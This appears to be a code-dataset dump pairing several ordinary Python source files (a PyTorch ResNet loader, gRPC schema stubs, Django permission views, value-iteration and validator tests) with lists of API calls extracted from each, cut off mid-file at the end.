code
stringlengths 20
1.05M
| apis
sequence | extract_api
stringlengths 75
5.24M
|
---|---|---|
import torch
import torch.nn as nn
def load_pytorch_model(resnet_name, pretrained):
return torch.hub.load('pytorch/vision:v0.6.0', resnet_name, pretrained=pretrained)
def freeze_layers(resnet_model):
for param in resnet_model.parameters():
param.requires_grad = False
return resnet_model
def get_resnet(version, class_number, pretrained, freeze_conv=False):
"""
Выбрать версию сети ResNet
:param version: 'resnet18','resnet34', 'resnet50', 'resnet101', 'resnet152',
'wide_resnet50_2', 'wide_resnet101_2',
'resnext50_32x4d', 'resnext101_32x8d',
:param class_number: python int
:param pretrained: bool
:param freeze_conv: bool
:return: torch model
"""
model = load_pytorch_model(version, pretrained)
print(f'Loaded: {version}')
if freeze_conv:
model = freeze_layers(model)
num_features = model.fc.in_features
model.fc = nn.Linear(num_features, class_number)
return model
| [
"torch.hub.load",
"torch.nn.Linear"
] | [((99, 174), 'torch.hub.load', 'torch.hub.load', (['"""pytorch/vision:v0.6.0"""', 'resnet_name'], {'pretrained': 'pretrained'}), "('pytorch/vision:v0.6.0', resnet_name, pretrained=pretrained)\n", (113, 174), False, 'import torch\n'), ((965, 1002), 'torch.nn.Linear', 'nn.Linear', (['num_features', 'class_number'], {}), '(num_features, class_number)\n', (974, 1002), True, 'import torch.nn as nn\n')] |
from riskGame.classes.agent.agent import Agent
from riskGame.classes.state.move import Move
class Human(Agent):
def __init__(self):
super(Human, self).__init__(None, None, None)
def play_human(self, state, bonus_hold_node_number=None, move_from_node_number=None, move_to_node_number=None, \
moved_armies=None, attacker_node_number=None, attacked_node_number=None, attacked_node_armies=None):
move = Move()
if bonus_hold_node_number:
node = state.get_current_player().get_node_by_name(bonus_hold_node_number)
move.set_bonus_hold_node(node)
if move_from_node_number and move_to_node_number and moved_armies > 0:
from_node = state.get_current_player().get_node_by_name(move_from_node_number)
to_node = state.get_current_player().get_node_by_name(move_to_node_number)
move.set_move_from_node(from_node)
move.set_move_to_node(to_node)
move.set_moved_armies(moved_armies)
if attacker_node_number and attacked_node_number and attacked_node_armies > 0:
attacker_node = state.get_current_player().get_node_by_name(attacker_node_number)
if attacker_node:
attacked_node = attacker_node.get_possible_attacked_node_by_name(attacked_node_number)
else:
attacked_node = None
move.set_attacker_node(attacker_node)
move.set_attacked_node(attacked_node)
move.set_attacked_node_armies(attacked_node_armies)
return self.play(state, move)
| [
"riskGame.classes.state.move.Move"
] | [((447, 453), 'riskGame.classes.state.move.Move', 'Move', ([], {}), '()\n', (451, 453), False, 'from riskGame.classes.state.move import Move\n')] |
from threading import Thread
from wraptor.context import maybe
def test_basic():
with maybe(lambda: False) as result:
assert result == False
check = False
with maybe(lambda: True):
check = True
assert check
def test_threads():
def worker(arr, index):
for i in range(5):
with maybe(lambda: i == 3):
arr[index] = True
workers = 100
arr = [False for i in range(workers)]
threads = [Thread(target=worker, args=(arr, i)) for i in range(workers)]
[t.start() for t in threads]
[t.join() for t in threads]
assert all(arr)
| [
"wraptor.context.maybe",
"threading.Thread"
] | [((92, 113), 'wraptor.context.maybe', 'maybe', (['(lambda : False)'], {}), '(lambda : False)\n', (97, 113), False, 'from wraptor.context import maybe\n'), ((183, 203), 'wraptor.context.maybe', 'maybe', (['(lambda : True)'], {}), '(lambda : True)\n', (188, 203), False, 'from wraptor.context import maybe\n'), ((468, 504), 'threading.Thread', 'Thread', ([], {'target': 'worker', 'args': '(arr, i)'}), '(target=worker, args=(arr, i))\n', (474, 504), False, 'from threading import Thread\n'), ((335, 357), 'wraptor.context.maybe', 'maybe', (['(lambda : i == 3)'], {}), '(lambda : i == 3)\n', (340, 357), False, 'from wraptor.context import maybe\n')] |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from authzed.api.v1alpha1 import schema_pb2 as authzed_dot_api_dot_v1alpha1_dot_schema__pb2
class SchemaServiceStub(object):
"""SchemaService implements operations on a Permissions System's Schema.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ReadSchema = channel.unary_unary(
'/authzed.api.v1alpha1.SchemaService/ReadSchema',
request_serializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.SerializeToString,
response_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.FromString,
)
self.WriteSchema = channel.unary_unary(
'/authzed.api.v1alpha1.SchemaService/WriteSchema',
request_serializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.SerializeToString,
response_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.FromString,
)
class SchemaServiceServicer(object):
"""SchemaService implements operations on a Permissions System's Schema.
"""
def ReadSchema(self, request, context):
"""Read returns the current Object Definitions for a Permissions System.
Errors include:
- INVALID_ARGUMENT: a provided value has failed to semantically validate
- NOT_FOUND: one of the Object Definitions being requested does not exist
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def WriteSchema(self, request, context):
"""Write overwrites the current Object Definitions for a Permissions System.
Any Object Definitions that exist, but are not included will be deleted.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SchemaServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'ReadSchema': grpc.unary_unary_rpc_method_handler(
servicer.ReadSchema,
request_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.FromString,
response_serializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.SerializeToString,
),
'WriteSchema': grpc.unary_unary_rpc_method_handler(
servicer.WriteSchema,
request_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.FromString,
response_serializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'authzed.api.v1alpha1.SchemaService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class SchemaService(object):
"""SchemaService implements operations on a Permissions System's Schema.
"""
@staticmethod
def ReadSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/authzed.api.v1alpha1.SchemaService/ReadSchema',
authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.SerializeToString,
authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def WriteSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/authzed.api.v1alpha1.SchemaService/WriteSchema',
authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.SerializeToString,
authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| [
"grpc.method_handlers_generic_handler",
"grpc.experimental.unary_unary",
"grpc.unary_unary_rpc_method_handler"
] | [((3077, 3176), 'grpc.method_handlers_generic_handler', 'grpc.method_handlers_generic_handler', (['"""authzed.api.v1alpha1.SchemaService"""', 'rpc_method_handlers'], {}), "('authzed.api.v1alpha1.SchemaService',\n rpc_method_handlers)\n", (3113, 3176), False, 'import grpc\n'), ((2355, 2629), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.ReadSchema'], {'request_deserializer': 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.FromString', 'response_serializer': 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.SerializeToString'}), '(servicer.ReadSchema,\n request_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.\n ReadSchemaRequest.FromString, response_serializer=\n authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.\n SerializeToString)\n', (2390, 2629), False, 'import grpc\n'), ((2714, 2991), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.WriteSchema'], {'request_deserializer': 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.FromString', 'response_serializer': 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.SerializeToString'}), '(servicer.WriteSchema,\n request_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.\n WriteSchemaRequest.FromString, response_serializer=\n authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.\n SerializeToString)\n', (2749, 2991), False, 'import grpc\n'), ((3728, 4110), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/authzed.api.v1alpha1.SchemaService/ReadSchema"""', 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.SerializeToString', 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/authzed.api.v1alpha1.SchemaService/ReadSchema',\n authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.\n SerializeToString, authzed_dot_api_dot_v1alpha1_dot_schema__pb2.\n ReadSchemaResponse.FromString, options, channel_credentials, insecure,\n call_credentials, compression, wait_for_ready, timeout, metadata)\n", (3757, 4110), False, 'import grpc\n'), ((4462, 4847), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/authzed.api.v1alpha1.SchemaService/WriteSchema"""', 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.SerializeToString', 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/authzed.api.v1alpha1.SchemaService/WriteSchema',\n authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.\n SerializeToString, authzed_dot_api_dot_v1alpha1_dot_schema__pb2.\n WriteSchemaResponse.FromString, options, channel_credentials, insecure,\n call_credentials, compression, wait_for_ready, timeout, metadata)\n", (4491, 4847), False, 'import grpc\n')] |
import numpy as np
theta = 0.00000000000000000000001 #a non zero positive number
ph = 0.55 #need to change to fit in new seetings
value_table = np.zeros(101)
action_table = np.zeros(101)
def agent_run():
global theta, ph, value_table
value = 0
delta = 0
sweep =0
i=30
while delta>=0:
sweep += 1
delta=0
for state in range(1,100):
value = value_table[state]
for action in range(1,min(state,100-state)+1):
if action + state >= 100:
temp_value = ph*(1 + value_table[state+action]) + (1 - ph)* (0 + value_table[state-action])
else:
temp_value = ph * (0 + value_table[state + action]) + (1 - ph) * (0 + value_table[state - action])
if temp_value > value:
value = temp_value #find max for all action
optimal_action = action
delta = max(delta, abs(value - value_table[state]))
if value > value_table[state]:
value_table[state] = value
action_table[state] = optimal_action
#print(delta) #debug
if delta < theta:
#print(sweep) #debug
return value_table
output= agent_run()
for i in range(0,100):
print(action_table[i])
for i in range(0, 100):
print(value_table[i])
#print(action_table) | [
"numpy.zeros"
] | [((147, 160), 'numpy.zeros', 'np.zeros', (['(101)'], {}), '(101)\n', (155, 160), True, 'import numpy as np\n'), ((177, 190), 'numpy.zeros', 'np.zeros', (['(101)'], {}), '(101)\n', (185, 190), True, 'import numpy as np\n')] |
#encoding=utf8
from django.http import HttpResponse,HttpResponseRedirect
from django.shortcuts import render
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.contrib.auth.models import User,Group
from django.core import urlresolvers
from app.permission.models import PagePermission, UserPerms,GroupPerms
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.decorators import login_required
def _get_named_patterns():
"Returns list of (pattern-name, pattern) tuples"
resolver = urlresolvers.get_resolver(None)
patterns = [
(key, value[0][0][0], value[1])
for key, value in resolver.reverse_dict.items()
if isinstance(key, basestring)
]
return patterns
@login_required
def initialize(request):
patterns = _get_named_patterns()
r = HttpResponse("initialized", content_type = 'text/plain')
for i1,i2,i3 in patterns:
#Perm.objects.create(name = i1,code = i3,url_regex = i3,action = i1)
try:
PagePermission.objects.get(code=i3)
except ObjectDoesNotExist:
p= PagePermission()
p.name = i1
p.code = i3
p.url_regex = i3
p.action = i1
p.save()
return r
@login_required
def user_change(request):
if request.method == 'GET':
userid = request.GET.get('uid')
#get user infomation
user = User.objects.get(id=userid)
#user permisson list for template
perm_qs = PagePermission.objects.all()
perms = [
dict(id=perm.id, name=perm.name, selected=False)
for perm in perm_qs]
#user permisson list for template
#group_qs = Group.objects.all()
# groups = [
# dict(id=group.id, name=group.name, selected=False)
# for group in group_qs
# ]
#add selected if user has permission
user_perms_qs = UserPerms.objects.filter(user=user)
user_perms_ids = [user_perm.perm_id for user_perm in user_perms_qs]
for i in perms:
if i['id'] in user_perms_ids:
i['has_perm'] = True
#add selected if user in these groups
# user_group_qs = user.groups.all()
# user_group_ids = [user_group.id for user_group in user_group_qs]
#
# for j in groups:
# if j['id'] in user_group_ids:
# j['selected'] = True
#render the template
return render(request, 'user/change_user.html',
{"perms": perms, 'user':user})
elif request.method == 'POST':
userid = request.POST.get('uid')
perm_ids = request.POST.getlist('permission_list[]')
group_ids = request.POST.getlist('group_list[]')
user = User.objects.get(id=userid)
#删除以前的权限
UserPerms.objects.filter(
user_id=userid,).delete()
#添加新权限
perm_ids = [long(permid) for permid in perm_ids]
for perm_id in perm_ids:
up = UserPerms()
up.perm_id = perm_id
up.user_id = userid
up.save()
#删除用户组
old_groups = user.groups.all()
for og in old_groups:
user.groups.remove(og)
user.save()
#添加新组
groups = Group.objects.filter(id__in=group_ids)
for g in groups:
user.groups.add(g)
user.save()
return HttpResponseRedirect('/perm/user/edit?uid=%s' % userid)
@login_required
def group_change(request):
if request.method == 'GET':
gid = request.GET.get('gid')
#get user infomation
group = Group.objects.get(id=gid)
#user permisson list for template
perm_qs = PagePermission.objects.all()
perms = [
dict(id=perm.id, name=perm.name, selected=False)
for perm in perm_qs]
group_perms_qs = GroupPerms.objects.filter(group=group)
group_perms_ids = [group_perm.perm_id for group_perm in group_perms_qs]
for i in perms:
if i['id'] in group_perms_ids:
i['has_perm'] = True
#add selected if user in these groups
#render the template
return render(request, 'user/group_change.html',
{"perms": perms, 'group': group})
elif request.method == 'POST':
gid = request.POST.get('gid')
perm_ids = request.POST.getlist('permission_list[]')
group = Group.objects.get(id=gid)
#删除以前的权限
GroupPerms.objects.filter(
group_id=gid,).delete()
#添加新权限
perm_ids = [long(permid) for permid in perm_ids]
for perm_id in perm_ids:
gp = GroupPerms()
gp.perm_id = perm_id
gp.group_id = gid
gp.save()
return HttpResponseRedirect('/perm/group/edit?gid=%s' % gid)
@login_required
def user_list(request):
key = request.GET.get('kw')
if key:
qs = User.objects.filter(username__contains=key)
else:
qs = User.objects.all()
page = request.GET.get('page')
paginator = Paginator(qs, 20)
try:
show_users = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
show_users = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
show_users = paginator.page(paginator.num_pages)
param = "pz=20&search_kw="+key if key else "pz=20"
return render(request, 'user_list.html', {'lines': show_users,"otherparam": param})
#
# def initialize(request):
# patterns = _get_named_patterns()
# r = HttpResponse("initialized", content_type = 'text/plain')
# for i1,i2,i3 in patterns:
# #Perm.objects.create(name = i1,code = i3,url_regex = i3,action = i1)
# try:
# Perm.objects.get(code=i3)
#
# except ObjectDoesNotExist:
# p= Perm()
# p.name = i1
# p.code = i3
# p.url_regex = i3
# p.action = i1
# p.save()
# return r
#
#
#
# def _get_named_patterns():
# "Returns list of (pattern-name, pattern) tuples"
# resolver = urlresolvers.get_resolver(None)
#
# for url_ptn in resolver.url_patterns:
# print url_ptn
#
# for key, value in resolver.reverse_dict.items() :
# if isinstance(key, basestring):
# print key,value
# patterns = [
# (key, value[0][0][0],value[1])
# for key, value in resolver.reverse_dict.items()
# if isinstance(key, basestring)
# ]
# return patterns
#
#
#
# def edit(request):
#
#
# if request.method == "GET":
# perms = Perm.objects.all()
# uids = request.GET.get("uids","")
# gids = request.GET.get("gids","")
# if uids:
# member = User.objects.get(id = uids)
# _user_perms = UserPerms.objects.filter(user = member)
# given_perm_ids = [up.perm_id for up in _user_perms]
# elif gids:
# member = Group.objects.get(id = gids)
# _usergroup_perms = UserGroupPerms.objects.filter(group = member.id)
# given_perm_ids = [up.perm_id for up in _usergroup_perms]
#
# return render_to_response("admin/edit_perms.html",locals())
# else:
# uids = request.POST.get("uids")
# gids = request.POST.get("gids")
#
# chosen_perms = map(int,request.POST.getlist("chosen_perms"))
#
# if uids:
# former_perms = UserPerms.objects.filter(user__id = uids)
# former_perm_ids = [up.perm_id for up in former_perms]
# to_delete_perms = set(former_perm_ids) - set(chosen_perms)
# to_add_perms = set(chosen_perms) - set(former_perm_ids)
#
# UserPerms.change_perm(uids,to_delete_perms,to_add_perms)
#
# if gids:
# former_perms = UserGroupPerms.objects.filter(group__id = gids)
# former_perm_ids = [ugp.perm_id for ugp in former_perms]
# to_delete_perms = set(former_perm_ids) - set(chosen_perms)
# to_add_perms = set(chosen_perms) - set(former_perm_ids)
#
# UserGroupPerms.change_perm(gids,to_delete_perms,to_add_perms)
#
# return HttpResponse("EDIT PERMS") | [
"django.shortcuts.render",
"django.http.HttpResponseRedirect",
"app.permission.models.UserPerms.objects.filter",
"app.permission.models.GroupPerms",
"django.contrib.auth.models.Group.objects.get",
"django.contrib.auth.models.Group.objects.filter",
"app.permission.models.UserPerms",
"django.http.HttpResponse",
"django.contrib.auth.models.User.objects.all",
"app.permission.models.PagePermission",
"django.core.urlresolvers.get_resolver",
"django.contrib.auth.models.User.objects.filter",
"app.permission.models.GroupPerms.objects.filter",
"app.permission.models.PagePermission.objects.all",
"app.permission.models.PagePermission.objects.get",
"django.contrib.auth.models.User.objects.get",
"django.core.paginator.Paginator"
] | [((551, 582), 'django.core.urlresolvers.get_resolver', 'urlresolvers.get_resolver', (['None'], {}), '(None)\n', (576, 582), False, 'from django.core import urlresolvers\n'), ((850, 904), 'django.http.HttpResponse', 'HttpResponse', (['"""initialized"""'], {'content_type': '"""text/plain"""'}), "('initialized', content_type='text/plain')\n", (862, 904), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((5144, 5161), 'django.core.paginator.Paginator', 'Paginator', (['qs', '(20)'], {}), '(qs, 20)\n', (5153, 5161), False, 'from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\n'), ((5562, 5639), 'django.shortcuts.render', 'render', (['request', '"""user_list.html"""', "{'lines': show_users, 'otherparam': param}"], {}), "(request, 'user_list.html', {'lines': show_users, 'otherparam': param})\n", (5568, 5639), False, 'from django.shortcuts import render\n'), ((1442, 1469), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'id': 'userid'}), '(id=userid)\n', (1458, 1469), False, 'from django.contrib.auth.models import User, Group\n'), ((1530, 1558), 'app.permission.models.PagePermission.objects.all', 'PagePermission.objects.all', ([], {}), '()\n', (1556, 1558), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((1958, 1993), 'app.permission.models.UserPerms.objects.filter', 'UserPerms.objects.filter', ([], {'user': 'user'}), '(user=user)\n', (1982, 1993), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((2504, 2576), 'django.shortcuts.render', 'render', (['request', '"""user/change_user.html"""', "{'perms': perms, 'user': user}"], {}), "(request, 'user/change_user.html', {'perms': perms, 'user': user})\n", (2510, 2576), False, 'from django.shortcuts import render\n'), ((3678, 3703), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'id': 'gid'}), '(id=gid)\n', (3695, 3703), False, 'from django.contrib.auth.models import User, Group\n'), ((3764, 3792), 'app.permission.models.PagePermission.objects.all', 'PagePermission.objects.all', ([], {}), '()\n', (3790, 3792), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((3932, 3970), 'app.permission.models.GroupPerms.objects.filter', 'GroupPerms.objects.filter', ([], {'group': 'group'}), '(group=group)\n', (3957, 3970), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((4248, 4323), 'django.shortcuts.render', 'render', (['request', '"""user/group_change.html"""', "{'perms': perms, 'group': group}"], {}), "(request, 'user/group_change.html', {'perms': perms, 'group': group})\n", (4254, 4323), False, 'from django.shortcuts import render\n'), ((5007, 5050), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username__contains': 'key'}), '(username__contains=key)\n', (5026, 5050), False, 'from django.contrib.auth.models import User, Group\n'), ((5074, 5092), 'django.contrib.auth.models.User.objects.all', 'User.objects.all', ([], {}), '()\n', (5090, 5092), False, 'from django.contrib.auth.models import User, Group\n'), ((1039, 1074), 'app.permission.models.PagePermission.objects.get', 'PagePermission.objects.get', ([], {'code': 'i3'}), '(code=i3)\n', (1065, 1074), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((2810, 2837), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'id': 'userid'}), '(id=userid)\n', (2826, 2837), False, 'from django.contrib.auth.models import User, Group\n'), ((3326, 3364), 'django.contrib.auth.models.Group.objects.filter', 'Group.objects.filter', ([], {'id__in': 'group_ids'}), '(id__in=group_ids)\n', (3346, 3364), False, 'from django.contrib.auth.models import User, Group\n'), ((3461, 3516), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (["('/perm/user/edit?uid=%s' % userid)"], {}), "('/perm/user/edit?uid=%s' % userid)\n", (3481, 3516), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((4499, 4524), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'id': 'gid'}), '(id=gid)\n', (4516, 4524), False, 'from django.contrib.auth.models import User, Group\n'), ((4852, 4905), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (["('/perm/group/edit?gid=%s' % gid)"], {}), "('/perm/group/edit?gid=%s' % gid)\n", (4872, 4905), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((1126, 1142), 'app.permission.models.PagePermission', 'PagePermission', ([], {}), '()\n', (1140, 1142), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((3051, 3062), 'app.permission.models.UserPerms', 'UserPerms', ([], {}), '()\n', (3060, 3062), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((4737, 4749), 'app.permission.models.GroupPerms', 'GroupPerms', ([], {}), '()\n', (4747, 4749), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((2864, 2904), 'app.permission.models.UserPerms.objects.filter', 'UserPerms.objects.filter', ([], {'user_id': 'userid'}), '(user_id=userid)\n', (2888, 2904), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((4551, 4590), 'app.permission.models.GroupPerms.objects.filter', 'GroupPerms.objects.filter', ([], {'group_id': 'gid'}), '(group_id=gid)\n', (4576, 4590), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n')] |
import textwrap
import pytest
def test_multi_examples(testdir):
testdir.makefile(
".feature",
steps=textwrap.dedent(
"""\
Feature: test pytest-bdd step extension
pytest-bdd step extension test, step params alias and constant step params e.g.
Examples:
| v1 |
| k11 |
| k12 |
Examples:
| v2 |
| k21 |
| k22 |
Scenario Outline: test multi examples
Then show result: <v1> <v2> <v3> <v4>
Examples:
| v3 |
| k31 |
| k32 |
Examples:
| v4 |
| k41 |
| k42 |
Examples:
| v2 |
| k23 |
| k24 |
"""
),
)
testdir.makepyfile(
textwrap.dedent(
"""\
from pytest_bdd import given, then, scenario
@then("show result: <v1> <v2> <v3> <v4>")
def step_then_show_result(v1, v2, v3, v4):
print ("show result: {0}_{1}_{2}_{3}".format(v1, v2, v3, v4))
@scenario('steps.feature', 'test multi examples')
def test_multi_examples():
pass
"""
)
)
result = testdir.runpytest("-v", "-s")
result.assert_outcomes(passed=16, failed=0)
| [
"textwrap.dedent"
] | [((970, 1385), 'textwrap.dedent', 'textwrap.dedent', (['""" from pytest_bdd import given, then, scenario\n\n\n @then("show result: <v1> <v2> <v3> <v4>")\n def step_then_show_result(v1, v2, v3, v4):\n print ("show result: {0}_{1}_{2}_{3}".format(v1, v2, v3, v4))\n\n\n @scenario(\'steps.feature\', \'test multi examples\')\n def test_multi_examples():\n pass\n """'], {}), '(\n """ from pytest_bdd import given, then, scenario\n\n\n @then("show result: <v1> <v2> <v3> <v4>")\n def step_then_show_result(v1, v2, v3, v4):\n print ("show result: {0}_{1}_{2}_{3}".format(v1, v2, v3, v4))\n\n\n @scenario(\'steps.feature\', \'test multi examples\')\n def test_multi_examples():\n pass\n """\n )\n', (985, 1385), False, 'import textwrap\n'), ((122, 916), 'textwrap.dedent', 'textwrap.dedent', (['""" Feature: test pytest-bdd step extension\n pytest-bdd step extension test, step params alias and constant step params e.g.\n\n Examples:\n | v1 |\n | k11 |\n | k12 |\n\n Examples:\n | v2 |\n | k21 |\n | k22 |\n\n\n Scenario Outline: test multi examples\n Then show result: <v1> <v2> <v3> <v4>\n Examples:\n | v3 |\n | k31 |\n | k32 |\n Examples:\n | v4 |\n | k41 |\n | k42 |\n Examples:\n | v2 |\n | k23 |\n | k24 | \n """'], {}), '(\n """ Feature: test pytest-bdd step extension\n pytest-bdd step extension test, step params alias and constant step params e.g.\n\n Examples:\n | v1 |\n | k11 |\n | k12 |\n\n Examples:\n | v2 |\n | k21 |\n | k22 |\n\n\n Scenario Outline: test multi examples\n Then show result: <v1> <v2> <v3> <v4>\n Examples:\n | v3 |\n | k31 |\n | k32 |\n Examples:\n | v4 |\n | k41 |\n | k42 |\n Examples:\n | v2 |\n | k23 |\n | k24 | \n """\n )\n', (137, 916), False, 'import textwrap\n')] |
from spotlight.tests.validator_test import ValidatorTest
from spotlight import errors as err
class CustomMessageTest(ValidatorTest):
def setUp(self):
self.validator.messages = {}
self.validator.fields = {}
self.validator.values = {}
def test_custom_field_message_expect_new_message(self):
new_message = "You've supplied an invalid e-mail address."
rules = {
"email": "email"
}
input_values = {
"email": "this.is.not.a.valid.email"
}
messages = {
"email": new_message
}
self.validator.messages = messages
errors = self.validator.validate(input_values, rules)
errs = errors.get("email")
self.assertEqual(errs[0], new_message)
def test_custom_subfield_message_expect_new_message(self):
new_message = "Hey! This is a required field!"
rules = {
"email": "required"
}
input_values = {}
messages = {
"email.required": new_message
}
self.validator.messages = messages
errors = self.validator.validate(input_values, rules)
errs = errors.get("email")
self.assertEqual(errs[0], new_message)
def test_custom_subfield_message_with_field_expect_new_message(self):
new_message = "Hey! The {field} field is a required field!"
rules = {
"email": "required"
}
input_values = {}
messages = {
"email.required": new_message
}
self.validator.messages = messages
errors = self.validator.validate(input_values, rules)
errs = errors.get("email")
self.assertEqual(errs[0], new_message.format(field="email"))
def test_custom_subfield_message_with_min_expect_new_message(self):
new_message = "Hey! The {field} field has to be at least {min} chars!"
rules = {
"email": "min:5"
}
input_values = {
"email": "oops"
}
messages = {
"email.min": new_message
}
self.validator.messages = messages
errors = self.validator.validate(input_values, rules)
errs = errors.get("email")
self.assertEqual(errs[0], new_message.format(field="email", min=5))
def test_custom_field_expect_new_field(self):
rules = {
"test": "min:5"
}
input_values = {
"test": "oops"
}
fields = {
"test": "custom"
}
self.validator.fields = fields
expected = err.MIN_STRING_ERROR.format(field="custom", min=5)
errors = self.validator.validate(input_values, rules)
errs = errors.get("test")
self.assertEqual(errs[0], expected)
def test_custom_field_and_custom_other_field_expect_new_fields(self):
new_message = "The {field} field has to be present with {other}."
rules = {
"test1": "required",
"test2": "required_with:test1"
}
input_values = {
"test1": "hello"
}
messages = {
"test2.required_with": new_message
}
fields = {
"test1": "custom",
"test2": "lol"
}
self.validator.messages = messages
self.validator.fields = fields
expected = new_message.format(field="lol", other="custom")
errors = self.validator.validate(input_values, rules)
errs = errors.get("test2")
self.assertEqual(errs[0], expected)
def test_custom_field_message_with_custom_field_expect_new_message(self):
new_message = "You've supplied an invalid {field}."
rules = {
"email2": "email"
}
input_values = {
"email2": "this.is.not.a.valid.email"
}
messages = {
"email2": new_message
}
fields = {
"email2": "e-mail address"
}
self.validator.messages = messages
self.validator.fields = fields
errors = self.validator.validate(input_values, rules)
errs = errors.get("email2")
self.assertEqual(errs[0], new_message.format(field="e-mail address"))
def test_custom_values_with_in_rule_expect_new_values(self):
field = "test"
new_values = "piet, henk, jan"
rules = {
"test": "in:val1,val2,val3"
}
input_values = {
"test": "this.is.not.a.valid.email"
}
values = {
"test": {
"values": new_values
}
}
self.validator.values = values
expected = err.IN_ERROR.format(field=field, values=new_values)
errors = self.validator.validate(input_values, rules)
errs = errors.get(field)
self.assertEqual(errs[0], expected)
def test_custom_fields_with_required_if_rule_expect_new_fields(self):
new_message = "The {field} field is required when {other} is {value}."
field = "credit card number"
other = "payment type"
value = "credit card"
rules = {
"payment_type": "in:crypto,cc,ideal",
"credit_card_number": "required_if:payment_type,cc"
}
input_values = {
"payment_type": "cc"
}
messages = {
"credit_card_number.required_if": new_message
}
fields = {
"payment_type": other,
"credit_card_number": field,
"cc": value
}
self.validator.messages = messages
self.validator.fields = fields
expected = new_message.format(
field=field,
